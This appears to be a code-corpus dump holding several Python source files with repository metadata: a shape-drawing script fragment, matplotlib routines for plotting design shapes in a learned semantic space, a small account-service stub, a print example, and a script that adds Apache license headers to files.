citation.filled = True
citation.color = 'black'
window.add(citation, 1000, 490)
def arrow():
point = GRect(3, 60)
point.filled = True
point.color = 'darkgray'
point.fill_color = 'darkgray'
window.add(point, 160, 350)
arc = GArc(60, 60, 240, 60)
arc.filled = True
arc.color = 'darkgray'
arc.fill_color = 'darkgray'
window.add(arc, 147, 323)
point = GRect(3, 60)
point.filled = True
point.color = 'darkgray'
point.fill_color = 'darkgray'
window.add(point, 280, 270)
arc = GArc(60, 60, 60, 60)
arc.filled = True
arc.color = 'darkgray'
arc.fill_color = 'darkgray'
window.add(arc, 266, 323)
# point = GRect(3, 60)
# point.filled = True
# point.color = 'darkgray'
# point.fill_color = 'darkgray'
# window.add(point, 383, 340)
# arc = GArc(60, 60, 60, 60)
# arc.filled = True
# arc.color = 'darkgray'
# arc.fill_color = 'darkgray'
# window.add(arc, 369, 393)
point = GRect(15, 3)
point.filled = True
point.color = 'darkgray'
point.fill_color = 'darkgray'
window.add(point, 523, 390)
arc = GArc(50, 50, 150, 60)
arc.filled = True
arc.color = 'darkgray'
arc.fill_color = 'darkgray'
window.add(arc, 529, 379)
arc = GArc(180, 7, 80, 130)
arc.filled = True
arc.color = 'darkgray'
arc.fill_color = 'darkgray'
window.add(arc, 749, 182)
arc = GArc(60, 60, 160, 60)
arc.filled = True
arc.color = 'darkgray'
arc.fill_color = 'darkgray'
window.add(arc, 795, 167)
point = GRect(3, 60)
point.filled = True
point.color = 'darkgray'
point.fill_color = 'darkgray'
window.add(point, 875, 120)
arc = GArc(60, 60, 240, 60)
arc.filled = True
arc.color = 'darkgray'
arc.fill_color = 'darkgray'
window.add(arc, 862, 93)
if __name__ == '__main__':
main()
| 29.283129
| 83
| 0.61502
| 6,256
| 45,301
| 4.410166
| 0.064578
| 0.093947
| 0.04382
| 0.053933
| 0.909967
| 0.90087
| 0.893186
| 0.87046
| 0.867742
| 0.863719
| 0
| 0.121666
| 0.249398
| 45,301
| 1,546
| 84
| 29.30207
| 0.689733
| 0.056754
| 0
| 0.738095
| 0
| 0
| 0.0982
| 0
| 0
| 0
| 0
| 0.001294
| 0
| 1
| 0.007937
| false
| 0
| 0.001443
| 0
| 0.00938
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
36d69627b48bf11686545644f9465c6ff6ab2176
| 21,000
|
py
|
Python
|
shape_plot.py
|
IDEALLab/design_embeddings_idetc_2016
|
f1a8d2b637707d8e76d3189e970310bf34755058
|
[
"MIT"
] | 1
|
2018-07-02T12:40:08.000Z
|
2018-07-02T12:40:08.000Z
|
shape_plot.py
|
IDEALLab/design_embeddings_idetc_2016
|
f1a8d2b637707d8e76d3189e970310bf34755058
|
[
"MIT"
] | null | null | null |
shape_plot.py
|
IDEALLab/design_embeddings_idetc_2016
|
f1a8d2b637707d8e76d3189e970310bf34755058
|
[
"MIT"
] | 2
|
2016-10-03T17:56:42.000Z
|
2021-06-04T13:18:12.000Z
|
"""
Plots samples or new shapes in the semantic space.
Author(s): Wei Chen (wchen459@umd.edu), Jonah Chazan (jchazan@umd.edu)
"""
from matplotlib import pyplot as plt
from sklearn import preprocessing
import numpy as np
import itertools
def scatter_plot(features, data_rec, train, test, parameterizations_train, parameterizations_test,
splines_train, splines_test, x_plots_train, x_plots_test, save_path, name_algorithm, mirror=True):
''' Create 3D scatter plot and corresponding 2D projections
of at most the first 3 dimensions of data'''
plt.rc("font", size=font_size)
n_samples_train = len(train)
n_samples_test = len(test)
n_dim = features.shape[1]
if n_dim == 3:
# Create a 3D scatter plot
fig3d = plt.figure()
ax3d = fig3d.add_subplot(111, projection = '3d')
ax3d.scatter(features[:,0], features[:,1], features[:,2])
ax3d.set_title(name_algorithm)
plt.savefig(save_path+name_algorithm+'/3d.png', dpi=300)
plt.close()
features_train = features[train]
features_test = features[test]
# Project 3D plot to 2D plots and label each point
figs = []
ax = []
k = 0
for i in range(0, n_dim-1):
for j in range(i+1, n_dim):
figs.append(plt.figure())
ax.append(figs[k].add_subplot(111))
# Plot training data
for index in range(n_samples_train):
ax[k].scatter(features_train[index,i], features_train[index,j], s = 7)
m = splines_train[index].M(parameterizations_train[index], x_plots_train[index]).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .08 / (mx - mn)
yscl = .08 / (mx - mn)
ax[k].plot( *zip(*[(x * xscl + features_train[index, i], -y * yscl + features_train[index, j])
for (x, y) in m]), color='red')
if mirror:
ax[k].plot( *zip(*[(-x * xscl + features_train[index, i], -y * yscl + features_train[index, j])
for (x, y) in m]), color='red')
'''
# Draw reconstructed samples for training data
m2 = splines_train[index].M(parameterizations_train[index], data_rec_train[index].reshape((-1,2))).tolist()
mx2 = max([y for (x, y) in m2])
mn2 = min([y for (x, y) in m2])
xscl2 = .08 / (mx2 - mn2)
yscl2 = .08 / (mx2 - mn2)
ax[k].plot( *zip(*[(x * xscl2 + features_train[index, i], -y * yscl2 + features_train[index, j])
for (x, y) in m2]), color='green', alpha=0.5)
if mirror:
ax[k].plot( *zip(*[(-x * xscl2 + features_train[index, i], -y * yscl2 + features_train[index, j])
for (x, y) in m2]), color='green', alpha=0.5)
'''
#Plot testing data
for index in range(n_samples_test):
ax[k].scatter(features_test[index, i], features_test[index, j], s = 7)
m = splines_test[index].M(parameterizations_test[index], x_plots_test[index]).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .08 / (mx - mn)
yscl = .08 / (mx - mn)
ax[k].plot( *zip(*[(x * xscl + features_test[index, i], -y * yscl + features_test[index, j])
for (x, y) in m]), color='blue')
if mirror:
ax[k].plot( *zip(*[(-x * xscl + features_test[index, i], -y * yscl + features_test[index, j])
for (x, y) in m]), color='blue')
'''
# Draw reconstructed samples for testing data
m2 = splines_test[index].M(parameterizations_test[index], data_rec_test[index].reshape((-1,2))).tolist()
mx2 = max([y for (x, y) in m2])
mn2 = min([y for (x, y) in m2])
xscl2 = .08 / (mx2 - mn2)
yscl2 = .08 / (mx2 - mn2)
ax[k].plot( *zip(*[(x * xscl2 + features_test[index, i], -y * yscl2 + features_test[index, j])
for (x, y) in m2]), color='cyan', alpha=0.7)
if mirror:
ax[k].plot( *zip(*[(-x * xscl2 + features_test[index, i], -y * yscl2 + features_test[index, j])
for (x, y) in m2]), color='cyan', alpha=0.7)
'''
ax[k].set_title(name_algorithm)
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Dimension-'+str(i+1))
plt.ylabel('Dimension-'+str(j+1))
#ax[k].text(-0.1, -0.1, 'training error = '+str(err_train)+' / testing error = '+str(err_test))
k += 1
plt.savefig(save_path+name_algorithm+'/'+str(i+1)+'-'+str(j+1)+'.png', dpi=300)
plt.close()
def plot_semantic_space_grid(points_per_axis, n_dim, min_maxes, inverse_transform, save_path, name_algorithm,
spline, boundary=None, kde=None, n_init_points=1000, mirror=True):
''' Plot reconstructed glass contours in the semantic space.
If the semantic space is 3D (i.e., n_dim=3), plot one slice of the 3D space at each time. '''
plt.rc("font", size=font_size)
linewidth = 3
u0 = spline.uniform_parameterisation(n_init_points)
lincoords = []
for i in range(0,n_dim):
lincoords.append(np.linspace(min_maxes[i][0],min_maxes[i][1],points_per_axis))
coords = list(itertools.product(*lincoords)) # Create a list of coordinates in the semantic space
coords_norm = preprocessing.MinMaxScaler().fit_transform(coords) # Min-Max normalization
if kde is not None:
# Density evaluation for coords_norm
kde_scores = np.exp(kde.score_samples(coords_norm))
coords_norm = coords_norm.tolist()
data_rec = inverse_transform(np.array(coords)) # Reconstruct B-spline control points
# Determine if the i-th item of coords_norm is in the convex hull
indices = []
for i in range(len(coords)):
c = tuple(coords_norm[i]) + (1,)
if boundary is not None:
e = np.dot(boundary, np.expand_dims(c, axis=1))
if boundary is None or np.all(e <= 0):
#if kde is None or kde_scores[i] > 0.25:
indices.append(i)
if n_dim < 3:
# Create a 2D plot
fig = plt.figure()
ax = fig.add_subplot(111)
for i in indices:
ax.scatter(coords_norm[i][0], coords_norm[i][1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
alpha = kde_scores[i] + .3
if alpha > 1:
alpha = 1
ax.plot( *zip(*[(x * xscl + coords_norm[i][0], -y * yscl + coords_norm[i][1]) for (x, y) in m]), linewidth=linewidth, color='blue', alpha=alpha)
if mirror:
ax.plot( *zip(*[(-x * xscl + coords_norm[i][0], -y * yscl + coords_norm[i][1]) for (x, y) in m]), linewidth=linewidth, color='blue', alpha=alpha)
ax.set_title(name_algorithm, fontsize=20)
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Dimension-1')
plt.ylabel('Dimension-2')
plt.savefig(save_path+name_algorithm+'/' + 'semantic_space.png', dpi=300)
if kde is not None:
for i in indices:
# Compute and annotate sparsity for coords_norm[i]
#kde_score = np.exp(kde.score_samples(np.reshape(coords_norm[i], (1, -1))))[0]
ax.annotate('{:.2f}'.format(kde_scores[i]), (coords_norm[i][0], coords_norm[i][1]), fontsize=12)
plt.savefig(save_path+name_algorithm+'/'+'semantic_space_sparsity.png', dpi=300)
plt.close()
else:
# Create slices of 2D plots for n_dim = 3
coords_norm = np.array(coords_norm)[indices,:]
data_rec = data_rec[indices,:]
# Sort coords_norm and data_rec simultanously by the 3rd column in coords_norm (z coordinates)
cc = np.concatenate((coords_norm, data_rec), axis=1)
cc = cc[np.argsort(cc[:,2])]
coords_norm = cc[:,:3]
data_rec = cc[:,3:]
k = 0
figs = []
ax = []
figs.append(plt.figure())
ax.append(figs[k].add_subplot(111))
z = coords_norm[0,2]
for i in range(len(coords_norm)):
if coords_norm[i, 2] == z:
ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
if mirror:
ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
else:
ax[k].set_title(name_algorithm+' (z = '+str(z)+')')
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Dimension-1')
plt.ylabel('Dimension-2')
plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
plt.close()
k += 1
z = coords_norm[i, 2]
figs.append(plt.figure())
ax.append(figs[k].add_subplot(111))
ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
if mirror:
ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color='blue')
# if kde is not None:
# for i in indices:
# # Compute and annotate sparsity for coords_norm[i]
# #kde_score = np.exp(kde.score_samples(np.reshape(coords_norm[i], (1, -1))))[0]
# ax[k].annotate('{:.2f}'.format(kde_scores[i]), (coords_norm[i][0], coords_norm[i][1]), fontsize=16)
# plt.savefig(save_path+name_algorithm+'/'+'semantic_space_sparsity.png', dpi=300)
# plt.close()
ax[k].set_title(name_algorithm+' (z = '+str(z)+')')
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Dimension-1')
plt.ylabel('Dimension-2')
plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
plt.close()
def plot_original_space_grid(points_per_axis, n_dim, min_maxes, inverse_transform, save_path, name_algorithm,
spline, n_init_points=1000, mirror=True):
''' Plot reconstructed glass contours in the semantic space.
If the semantic space is 3D (i.e., n_dim=3), plot one slice of the 3D space at each time. '''
print "plotting original space"
plt.rc("font", size=font_size)
u0 = spline.uniform_parameterisation(n_init_points)
lincoords = []
for i in range(0,n_dim):
lincoords.append(np.linspace(min_maxes[i][0],min_maxes[i][1],points_per_axis))
coords = list(itertools.product(*lincoords)) # Create a list of coordinates in the semantic space
coords_norm = preprocessing.MinMaxScaler().fit_transform(coords) # Min-Max normalization
data_rec = inverse_transform(np.array(coords)) # Reconstruct B-spline control points
indices = range(len(coords))
if n_dim < 3:
# Create a 2D plot
fig = plt.figure()
ax = fig.add_subplot(111)
for i in indices:
ax.scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
color = 'blue'
ax.plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
if mirror:
ax.plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
ax.set_title(name_algorithm, fontsize=20)
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('a')
plt.ylabel('b')
plt.savefig(save_path+'semantic_space.png', dpi=300)
plt.close()
else:
# Create slices of 2D plots for n_dim = 3
coords_norm = np.array(coords_norm)[indices,:]
data_rec = data_rec[indices,:]
# Sort coords_norm and data_rec simultanously by the 3rd column in coords_norm (z coordinates)
cc = np.concatenate((coords_norm, data_rec), axis=1)
cc = cc[np.argsort(cc[:,2])]
coords_norm = cc[:,:3]
data_rec = cc[:,3:]
k = 0
figs = []
ax = []
figs.append(plt.figure())
ax.append(figs[k].add_subplot(111))
z = coords_norm[0,2]
for i in range(len(coords_norm)):
if coords_norm[i, 2] == z:
ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
if mirror:
ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
else:
ax[k].set_title(name_algorithm+' (Semantic feature 3 = '+str(z)+')')
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Semantic feature 1')
plt.ylabel('Semantic feature 2')
plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
plt.close()
k += 1
z = coords_norm[i, 2]
figs.append(plt.figure())
ax.append(figs[k].add_subplot(111))
ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
if mirror:
ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
ax[k].set_title(name_algorithm+' (Semantic feature 3 = '+str(z)+')')
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Semantic feature 1')
plt.ylabel('Semantic feature 2')
plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
plt.close()
def plot_original_space_examples(points_per_axis, n_dim, min_maxes, inverse_transform, save_path, name_algorithm,
spline, samples, n_init_points=1000, mirror=True):
''' Plot reconstructed glass contours in the semantic space.
If the semantic space is 3D (i.e., n_dim=3), plot one slice of the 3D space at each time. '''
print "plotting original space"
plt.rc("font", size=font_size)
u0 = spline.uniform_parameterisation(n_init_points)
coords = samples
coords_norm = preprocessing.MinMaxScaler().fit_transform(coords) # Min-Max normalization
data_rec = inverse_transform(np.array(coords)) # Reconstruct B-spline control points
indices = range(len(coords))
if n_dim < 3:
# Create a 2D plot
fig = plt.figure()
ax = fig.add_subplot(111)
for i in indices:
ax.scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
color = 'red'
ax.plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
if mirror:
ax.plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
ax.set_title(name_algorithm, fontsize=20)
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('a')
plt.ylabel('b')
plt.savefig(save_path+'samples.png', dpi=300)
plt.close()
else:
# Create slices of 2D plots for n_dim = 3
coords_norm = np.array(coords_norm)[indices,:]
data_rec = data_rec[indices,:]
# Sort coords_norm and data_rec simultanously by the 3rd column in coords_norm (z coordinates)
cc = np.concatenate((coords_norm, data_rec), axis=1)
cc = cc[np.argsort(cc[:,2])]
coords_norm = cc[:,:3]
data_rec = cc[:,3:]
k = 0
figs = []
ax = []
figs.append(plt.figure())
ax.append(figs[k].add_subplot(111))
z = coords_norm[0,2]
for i in range(len(coords_norm)):
if coords_norm[i, 2] == z:
ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
if mirror:
ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
else:
ax[k].set_title(name_algorithm+' (Semantic feature 3 = '+str(z)+')')
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Semantic feature 1')
plt.ylabel('Semantic feature 2')
plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
plt.close()
k += 1
z = coords_norm[i, 2]
figs.append(plt.figure())
ax.append(figs[k].add_subplot(111))
ax[k].scatter(coords_norm[i, 0], coords_norm[i, 1], s = 7)
m = spline.M(u0, data_rec[i].reshape((-1,2))).tolist()
mx = max([y for (x, y) in m])
mn = min([y for (x, y) in m])
xscl = .7 / (mx - mn) / points_per_axis
yscl = .7 / (mx - mn) / points_per_axis
ax[k].plot( *zip(*[(x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
if mirror:
ax[k].plot( *zip(*[(-x * xscl + coords_norm[i, 0], -y * yscl + coords_norm[i, 1]) for (x, y) in m]), color=color)
ax[k].set_title(name_algorithm+' (Semantic feature 3 = '+str(z)+')')
plt.xlim(-0.1, 1.1)
plt.ylim(-0.1, 1.1)
plt.xlabel('Semantic feature 1')
plt.ylabel('Semantic feature 2')
plt.savefig(save_path+name_algorithm+'/semantic_space_z='+str(z)+'.png', dpi=300)
plt.close()
font_size = 18
| 46.979866
| 161
| 0.516905
| 2,987
| 21,000
| 3.50385
| 0.073987
| 0.096503
| 0.072521
| 0.034779
| 0.863845
| 0.854863
| 0.837665
| 0.811485
| 0.811485
| 0.809192
| 0
| 0.034512
| 0.33081
| 21,000
| 446
| 162
| 47.085202
| 0.71024
| 0.079286
| 0
| 0.803681
| 0
| 0
| 0.040142
| 0.001594
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.01227
| null | null | 0.006135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7fc4662f4f37a3f0d333cb7a1041c0036bb00303
| 230
|
py
|
Python
|
application/server/routers/api/endpoints/accounts/deps.py
|
chaotism/fastapi-purser
|
c83a063e953efdf95fddf95828f5fa2d75933363
|
[
"MIT"
] | null | null | null |
application/server/routers/api/endpoints/accounts/deps.py
|
chaotism/fastapi-purser
|
c83a063e953efdf95fddf95828f5fa2d75933363
|
[
"MIT"
] | null | null | null |
application/server/routers/api/endpoints/accounts/deps.py
|
chaotism/fastapi-purser
|
c83a063e953efdf95fddf95828f5fa2d75933363
|
[
"MIT"
] | null | null | null |
from domain.accounts import AccountService, MotorAccountRepository
def get_account_service() -> AccountService:
return AccountService(
MotorAccountRepository()
) # TODO: add excepting error and connection close
| 28.75
| 66
| 0.769565
| 21
| 230
| 8.333333
| 0.857143
| 0.411429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 230
| 7
| 67
| 32.857143
| 0.921053
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0.2
| true
| 0
| 0.2
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3d3947b5100b4b2b65e9e0665ed2cfe45d6521b3
| 55
|
py
|
Python
|
4_src/3_other/1_surasura-python/q3-1/q3-1.py
|
hirobel/todoapp
|
834e6dcdd3e6c227a79004c89430c6853935b23c
|
[
"Apache-2.0"
] | null | null | null |
4_src/3_other/1_surasura-python/q3-1/q3-1.py
|
hirobel/todoapp
|
834e6dcdd3e6c227a79004c89430c6853935b23c
|
[
"Apache-2.0"
] | null | null | null |
4_src/3_other/1_surasura-python/q3-1/q3-1.py
|
hirobel/todoapp
|
834e6dcdd3e6c227a79004c89430c6853935b23c
|
[
"Apache-2.0"
] | null | null | null |
print('5<3:{}'.format(5<3))
print('5>3:{}'.format(5>3))
| 27.5
| 27
| 0.545455
| 12
| 55
| 2.5
| 0.333333
| 0.266667
| 0.466667
| 0.866667
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 0.018182
| 55
| 2
| 28
| 27.5
| 0.407407
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
3d5cc719ef15d600ff812aa507f334a121294758
| 6,310
|
py
|
Python
|
tests/lint/add_asf_header.py
|
baowenlei/tvm
|
6b2e18ed96fad26b4a5e5f8a6dcbedf9206c9a65
|
[
"Apache-2.0"
] | 1
|
2019-04-26T18:35:40.000Z
|
2019-04-26T18:35:40.000Z
|
tests/lint/add_asf_header.py
|
baowenlei/tvm
|
6b2e18ed96fad26b4a5e5f8a6dcbedf9206c9a65
|
[
"Apache-2.0"
] | null | null | null |
tests/lint/add_asf_header.py
|
baowenlei/tvm
|
6b2e18ed96fad26b4a5e5f8a6dcbedf9206c9a65
|
[
"Apache-2.0"
] | 2
|
2019-05-24T17:22:38.000Z
|
2019-06-14T23:30:24.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Helper tool to add ASF header to files that cannot be handled by Rat."""
import os
import sys
header_cstyle = """
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
""".strip()
header_mdstyle = """
<!--- Licensed to the Apache Software Foundation (ASF) under one -->
<!--- or more contributor license agreements. See the NOTICE file -->
<!--- distributed with this work for additional information -->
<!--- regarding copyright ownership. The ASF licenses this file -->
<!--- to you under the Apache License, Version 2.0 (the -->
<!--- "License"); you may not use this file except in compliance -->
<!--- with the License. You may obtain a copy of the License at -->
<!--- http://www.apache.org/licenses/LICENSE-2.0 -->
<!--- Unless required by applicable law or agreed to in writing, -->
<!--- software distributed under the License is distributed on an -->
<!--- "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -->
<!--- KIND, either express or implied. See the License for the -->
<!--- specific language governing permissions and limitations -->
<!--- under the License. -->
""".strip()
header_pystyle = """
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""".strip()
header_rststyle = """
.. Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
.. http://www.apache.org/licenses/LICENSE-2.0
.. Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
""".strip()
header_groovystyle = """
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
""".strip()
FMT_MAP = {
"toml" : header_pystyle,
"yml": header_pystyle,
"yaml": header_pystyle,
"rs" : header_cstyle,
"md" : header_mdstyle,
"cmake" : header_pystyle,
"rst" : header_rststyle,
"gradle" : header_groovystyle,
}
def add_header(fname, header):
"""Add header to file"""
if not os.path.exists(fname):
print("Cannot find %s ..." % fname)
return
orig = open(fname).read()
if orig.find("Licensed to the Apache Software Foundation") != -1:
print("Skip file %s ..." % fname)
return
with open(fname, "w") as outfile:
outfile.write(header + "\n\n")
outfile.write(orig)
print("Add header to %s" % fname)
def main(args):
if len(args) != 2:
print("Usage: python add_asf_header.py <file_list>")
for l in open(args[1]):
if l.find("File:") != -1:
l = l.split(":")[-1]
fname = l.strip()
suffix = fname.split(".")[-1]
if suffix in FMT_MAP:
add_header(fname, FMT_MAP[suffix])
else:
print("Cannot handle %s ..." % fname)
if __name__ == "__main__":
main(sys.argv)
| 38.47561
| 75
| 0.70523
| 901
| 6,310
| 4.90677
| 0.147614
| 0.08143
| 0.035286
| 0.043429
| 0.843248
| 0.843248
| 0.834879
| 0.834879
| 0.834879
| 0.834879
| 0
| 0.005927
| 0.197781
| 6,310
| 163
| 76
| 38.711656
| 0.867444
| 0.133439
| 0
| 0.071429
| 0
| 0
| 0.791804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0
| 0.015873
| 0
| 0.047619
| 0.039683
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
